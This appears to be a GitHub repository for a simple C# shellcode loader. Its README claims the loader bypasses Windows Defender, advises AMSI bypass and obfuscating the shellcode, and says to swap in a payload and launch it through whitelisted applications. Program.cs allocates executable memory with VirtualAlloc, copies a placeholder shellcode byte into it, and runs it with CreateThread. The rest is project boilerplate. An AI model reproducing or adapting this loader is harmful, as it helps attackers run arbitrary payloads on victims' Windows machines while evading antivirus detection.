├── README.md
└── ShellcodeLoader_Csharp
    ├── .vs
        └── ShellcodeLoader_Csharp
        │   └── v16
        │       └── .suo
    ├── ShellcodeLoader_Csharp.sln
    └── ShellcodeLoader_Csharp
        ├── App.config
        ├── Program.cs
        ├── Properties
            └── AssemblyInfo.cs
        ├── ShellcodeLoader_Csharp.csproj
        └── obj
            └── Debug
                ├── .NETFramework,Version=v4.7.2.AssemblyAttributes.cs
                ├── DesignTimeResolveAssemblyReferencesInput.cache
                └── ShellcodeLoader_Csharp.csprojAssemblyReference.cache


/README.md:
--------------------------------------------------------------------------------
 1 | # Simple_ShellCodeLoader_CSharp
 2 | 
 3 | - A simple shellcode loader inspire by (@Subtee) https://twitter.com/subTee
 4 | - I change the code a little bit, so now it should be able to bypass windows defender without the shellcode
 5 | - If you want to fully bypass windows defender, you gonna need to bypass AMSI and do some works to your shellcode, like obfuscation or encryption(I am gonna update a project soon which is a fully bypass windows defender project, hopefully, it is not too late, cause windows defender may catch up).
 6 | 
 7 | 
 8 | 
 9 | ## Usage
10 | 
11 | 1. Just replace the shellcode.
12 | 2. Launch it through some white list applications
13 | 
14 | 
15 | 
16 | ## Reference link
17 | 
18 | 1. https://gist.github.com/xpn/730f24f7e42fd0471d04bcbd74940baa


--------------------------------------------------------------------------------
/ShellcodeLoader_Csharp/.vs/ShellcodeLoader_Csharp/v16/.suo:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Kara-4search/Simple_ShellCodeLoader_CSharp/3acae3d51178d754700458f07d121acf9c0f60d8/ShellcodeLoader_Csharp/.vs/ShellcodeLoader_Csharp/v16/.suo


--------------------------------------------------------------------------------
/ShellcodeLoader_Csharp/ShellcodeLoader_Csharp.sln:
--------------------------------------------------------------------------------
 1 | 
 2 | Microsoft Visual Studio Solution File, Format Version 12.00
 3 | # Visual Studio Version 16
 4 | VisualStudioVersion = 16.0.31129.286
 5 | MinimumVisualStudioVersion = 10.0.40219.1
 6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "ShellcodeLoader_Csharp", "ShellcodeLoader_Csharp\ShellcodeLoader_Csharp.csproj", "{2336B5C6-C9C8-446C-B530-7F8C7EC212E3}"
 7 | EndProject
 8 | Global
 9 | 	GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | 		Debug|Any CPU = Debug|Any CPU
11 | 		Release|Any CPU = Release|Any CPU
12 | 	EndGlobalSection
13 | 	GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | 		{2336B5C6-C9C8-446C-B530-7F8C7EC212E3}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
15 | 		{2336B5C6-C9C8-446C-B530-7F8C7EC212E3}.Debug|Any CPU.Build.0 = Debug|Any CPU
16 | 		{2336B5C6-C9C8-446C-B530-7F8C7EC212E3}.Release|Any CPU.ActiveCfg = Release|Any CPU
17 | 		{2336B5C6-C9C8-446C-B530-7F8C7EC212E3}.Release|Any CPU.Build.0 = Release|Any CPU
18 | 	EndGlobalSection
19 | 	GlobalSection(SolutionProperties) = preSolution
20 | 		HideSolutionNode = FALSE
21 | 	EndGlobalSection
22 | 	GlobalSection(ExtensibilityGlobals) = postSolution
23 | 		SolutionGuid = {9133B034-9710-4134-9870-73A0FCB53DF3}
24 | 	EndGlobalSection
25 | EndGlobal
26 | 


--------------------------------------------------------------------------------
/ShellcodeLoader_Csharp/ShellcodeLoader_Csharp/App.config:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="utf-8" ?>
2 | <configuration>
3 |     <startup> 
4 |         <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.7.2" />
5 |     </startup>
6 | </configuration>


--------------------------------------------------------------------------------
/ShellcodeLoader_Csharp/ShellcodeLoader_Csharp/Program.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.Runtime.InteropServices;
 3 | 
 4 | 
 5 | 
 6 | namespace CalcLauncher
 7 | {
 8 |     public class Program
 9 |     {
10 | 
11 |         public Program()
12 |         {
13 |             CodeLoad();
14 |         }
15 | 
16 |         public static void Main(string[] args)
17 |         {
18 |             new Program();
19 |         }
20 | 
21 | 
22 |         public static void CodeLoad()
23 |         {
24 | 
25 | 
26 |             byte[] buf1 = new byte[1] { 0xfc };
27 |         
28 |             UInt32 funcAddr = VirtualAlloc(0, (UInt32)buf1.Length, 0x1000, 0x40);
29 |             //
30 |             Marshal.Copy(buf1, 0, (IntPtr)(funcAddr), buf1.Length);
31 | 
32 |             IntPtr hThread = IntPtr.Zero;
33 |             UInt32 threadId = 0;
34 |             // prepare data
35 | 
36 | 
37 |             IntPtr pinfo = IntPtr.Zero;
38 | 
39 |             // execute native code
40 | 
41 |             hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
42 |             System.Threading.Thread.Sleep(100000000);
43 |             WaitForSingleObject(hThread, 0xFFFFFFFF);
44 |             return;
45 |         }
46 | 
47 |         [DllImport("kernel32")]
48 |         private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr,
49 |           UInt32 size, UInt32 flAllocationType, UInt32 flProtect);
50 | 
51 | 
52 |         [DllImport("kernel32")]
53 |         private static extern IntPtr CreateThread(
54 | 
55 |          UInt32 lpThreadAttributes,
56 |          UInt32 dwStackSize,
57 |          UInt32 lpStartAddress,
58 |          IntPtr param,
59 |          UInt32 dwCreationFlags,
60 |          ref UInt32 lpThreadId
61 | 
62 |          );
63 | 
64 |         [DllImport("kernel32")]
65 |         private static extern UInt32 WaitForSingleObject(
66 | 
67 |          IntPtr hHandle,
68 |          UInt32 dwMilliseconds
69 |          );
70 |     }
71 | }
72 | 


--------------------------------------------------------------------------------
/ShellcodeLoader_Csharp/ShellcodeLoader_Csharp/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
 1 | using System.Reflection;
 2 | using System.Runtime.CompilerServices;
 3 | using System.Runtime.InteropServices;
 4 | 
 5 | // 有关程序集的一般信息由以下
 6 | // 控制。更改这些特性值可修改
 7 | // 与程序集关联的信息。
 8 | [assembly: AssemblyTitle("ShellcodeLoader_Csharp")]
 9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("ShellcodeLoader_Csharp")]
13 | [assembly: AssemblyCopyright("Copyright ©  2021")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 | 
17 | // 将 ComVisible 设置为 false 会使此程序集中的类型
18 | //对 COM 组件不可见。如果需要从 COM 访问此程序集中的类型
19 | //请将此类型的 ComVisible 特性设置为 true。
20 | [assembly: ComVisible(false)]
21 | 
22 | // 如果此项目向 COM 公开，则下列 GUID 用于类型库的 ID
23 | [assembly: Guid("2336b5c6-c9c8-446c-b530-7f8c7ec212e3")]
24 | 
25 | // 程序集的版本信息由下列四个值组成: 
26 | //
27 | //      主版本
28 | //      次版本
29 | //      生成号
30 | //      修订号
31 | //
32 | //可以指定所有这些值，也可以使用“生成号”和“修订号”的默认值
33 | //通过使用 "*"，如下所示:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 | 


--------------------------------------------------------------------------------
/ShellcodeLoader_Csharp/ShellcodeLoader_Csharp/ShellcodeLoader_Csharp.csproj:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="utf-8"?>
 2 | <Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
 3 |   <Import Project="$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props')" />
 4 |   <PropertyGroup>
 5 |     <Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
 6 |     <Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
 7 |     <ProjectGuid>{2336B5C6-C9C8-446C-B530-7F8C7EC212E3}</ProjectGuid>
 8 |     <OutputType>Exe</OutputType>
 9 |     <RootNamespace>ShellcodeLoader_Csharp</RootNamespace>
10 |     <AssemblyName>ShellcodeLoader_Csharp</AssemblyName>
11 |     <TargetFrameworkVersion>v4.7.2</TargetFrameworkVersion>
12 |     <FileAlignment>512</FileAlignment>
13 |     <AutoGenerateBindingRedirects>true</AutoGenerateBindingRedirects>
14 |     <Deterministic>true</Deterministic>
15 |   </PropertyGroup>
16 |   <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
17 |     <PlatformTarget>AnyCPU</PlatformTarget>
18 |     <DebugSymbols>true</DebugSymbols>
19 |     <DebugType>full</DebugType>
20 |     <Optimize>false</Optimize>
21 |     <OutputPath>bin\Debug\</OutputPath>
22 |     <DefineConstants>DEBUG;TRACE</DefineConstants>
23 |     <ErrorReport>prompt</ErrorReport>
24 |     <WarningLevel>4</WarningLevel>
25 |   </PropertyGroup>
26 |   <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
27 |     <PlatformTarget>AnyCPU</PlatformTarget>
28 |     <DebugType>pdbonly</DebugType>
29 |     <Optimize>true</Optimize>
30 |     <OutputPath>bin\Release\</OutputPath>
31 |     <DefineConstants>TRACE</DefineConstants>
32 |     <ErrorReport>prompt</ErrorReport>
33 |     <WarningLevel>4</WarningLevel>
34 |   </PropertyGroup>
35 |   <ItemGroup>
36 |     <Reference Include="System" />
37 |     <Reference Include="System.Core" />
38 |     <Reference Include="System.Xml.Linq" />
39 |     <Reference Include="System.Data.DataSetExtensions" />
40 |     <Reference Include="Microsoft.CSharp" />
41 |     <Reference Include="System.Data" />
42 |     <Reference Include="System.Net.Http" />
43 |     <Reference Include="System.Xml" />
44 |   </ItemGroup>
45 |   <ItemGroup>
46 |     <Compile Include="Program.cs" />
47 |     <Compile Include="Properties\AssemblyInfo.cs" />
48 |   </ItemGroup>
49 |   <ItemGroup>
50 |     <None Include="App.config" />
51 |   </ItemGroup>
52 |   <Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
53 | </Project>


--------------------------------------------------------------------------------
/ShellcodeLoader_Csharp/ShellcodeLoader_Csharp/obj/Debug/.NETFramework,Version=v4.7.2.AssemblyAttributes.cs:
--------------------------------------------------------------------------------
1 | // <autogenerated />
2 | using System;
3 | using System.Reflection;
4 | [assembly: global::System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.7.2", FrameworkDisplayName = ".NET Framework 4.7.2")]
5 | 


--------------------------------------------------------------------------------
/ShellcodeLoader_Csharp/ShellcodeLoader_Csharp/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Kara-4search/Simple_ShellCodeLoader_CSharp/3acae3d51178d754700458f07d121acf9c0f60d8/ShellcodeLoader_Csharp/ShellcodeLoader_Csharp/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache


--------------------------------------------------------------------------------
/ShellcodeLoader_Csharp/ShellcodeLoader_Csharp/obj/Debug/ShellcodeLoader_Csharp.csprojAssemblyReference.cache:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Kara-4search/Simple_ShellCodeLoader_CSharp/3acae3d51178d754700458f07d121acf9c0f60d8/ShellcodeLoader_Csharp/ShellcodeLoader_Csharp/obj/Debug/ShellcodeLoader_Csharp.csprojAssemblyReference.cache


--------------------------------------------------------------------------------